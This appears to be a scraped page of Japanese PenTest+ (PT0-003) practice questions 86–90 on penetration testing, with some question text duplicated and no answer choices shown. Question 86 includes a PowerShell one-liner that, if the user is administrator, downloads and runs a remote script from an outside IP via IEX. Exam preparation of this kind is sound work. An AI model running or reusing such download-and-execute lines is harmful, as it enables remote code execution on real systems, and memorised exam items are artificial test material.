PT0-003 試験問題 86
次のスクリプトがあるとします。
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1] If ($1 -eq "administrator") { echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -} 侵入テスターが実行しようとしている可能性が高いのは次のどれですか?
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1] If ($1 -eq "administrator") { echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -} 侵入テスターが実行しようとしている可能性が高いのは次のどれですか?
PT0-003 試験問題 87
侵入テスターは、従業員の氏名と電話番号を含む、公開された社内ディレクトリを発見しました。侵入テスターがユーザーアカウントを侵害したい場合、以下の攻撃手法のうちどれが最も効果的でしょうか?
PT0-003 試験問題 88
侵入テスターは、多数の顧客ホストにわたるいくつかの問題を特定する脆弱性スキャンを実行します。
実行報告書では、次の内容が概説されています。
クライアントは、消費者向けの本番アプリケーションの可用性について懸念しています。ペネトレーションテスターは、追加の手動テストを行うために、以下のどのホストを選択すべきでしょうか?
実行報告書では、次の内容が概説されています。
クライアントは、消費者向けの本番アプリケーションの可用性について懸念しています。ペネトレーションテスターは、追加の手動テストを行うために、以下のどのホストを選択すべきでしょうか?
PT0-003 試験問題 89
侵入テスターは攻撃経路上の位置を確立し、ターゲットホストに返送するDNSクエリ応答を特別に作成する必要があります。この目的を最もよくサポートするユーティリティは次のうちどれですか?
PT0-003 試験問題 90
侵入テスターが以前に正常にスキャンされたサーバーをスキャンできない理由を最もよく説明しているのは次のうちどれですか。